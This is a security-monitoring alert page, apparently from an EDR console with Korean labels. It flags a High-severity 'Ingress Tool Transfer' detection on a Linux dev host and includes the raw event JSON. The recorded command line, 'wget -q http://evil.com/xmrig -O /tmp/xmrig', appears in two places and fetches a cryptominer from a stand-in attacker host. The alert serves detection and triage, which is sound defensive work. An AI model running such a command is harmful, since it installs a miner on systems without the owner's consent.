Alert Details - DeFender X

Alert Information High

Alert ID: ind:021368f9220b45cdb2760a069897c1c8:1766236055862436718-30126-1495312
Composite ID: 84393bf974fd44bda943a25a6a7bc27f:ind:021368f9220b45cdb2760a069897c1c8:1766236055862436718-30126-1495312
설명: An attempt to download malicious files from the command-line interface has been detected on your host. Adversaries might use curl or wget to download additional payloads in case of compromise. Please review the event to determine if malicious files were downloaded or if this access was expected.
호스트: siemdev-14
상태: new
생성 시간: 2025-12-20 22:08:37
업데이트 시간: 2025-12-20 23:07:37

MITRE ATT&CK

Tactic: Command and Control
Technique: Ingress Tool Transfer

Command Line

wget -q http://evil.com/xmrig -O /tmp/xmrig

Raw JSON Data

{"id":"ind:021368f9220b45cdb2760a069897c1c8:1766236055862436718-30126-1495312","composite_id":"84393bf974fd44bda943a25a6a7bc27f:ind:021368f9220b45cdb2760a069897c1c8:1766236055862436718-30126-1495312","agent_id":"021368f9220b45cdb2760a069897c1c8","cid":"84393bf974fd44bda943a25a6a7bc27f","description":"An attempt to download malicious files from the command-line interface has been detected on your host. Adversaries might use curl or wget to download additional payloads in case of compromise. Please review the event to determine if malicious files were downloaded or if this access was expected.","severity":70,"severity_name":"High","confidence":80,"tactic":"Command and Control","tactic_id":"TA0011","technique":"Ingress Tool Transfer","technique_id":"T1105","cmdline":"wget -q http://evil.com/xmrig -O /tmp/xmrig","filename":"wget","filepath":"/usr/bin/wget","sha256":"4b602e7fa973360bc46910aec235979f4b8f027e52625ed36348476ed90ad049","status":"new","type":"ldt","created_timestamp":"2025-12-20T13:08:37.915470549Z","updated_timestamp":"2025-12-20T14:07:37.924065126Z","device":{"device_id":"021368f9220b45cdb2760a069897c1c8","cid":"84393bf974fd44bda943a25a6a7bc27f","agent_version":"7.31.18410.0","hostname":"siemdev-14","local_ip":"172.17.0.1","external_ip":"211.198.135.5","mac_address":"16-bc-32-c0-b2-f4","platform_name":"Linux","os_version":"Rocky Linux 10.1"},"aggregate_id":"aggind:021368f9220b45cdb2760a069897c1c8:25840316630","CreatedAt":"2025-12-20T22:08:37.9154705+09:00","UpdatedAt":"2025-12-20T23:07:37.9240651+09:00"}

Quick Info

Severity High
Score 70
Agent ID 021368f9220b45cdb2760a069897c1c8

Actions

Falcon Console에서 보기 목록으로 돌아가기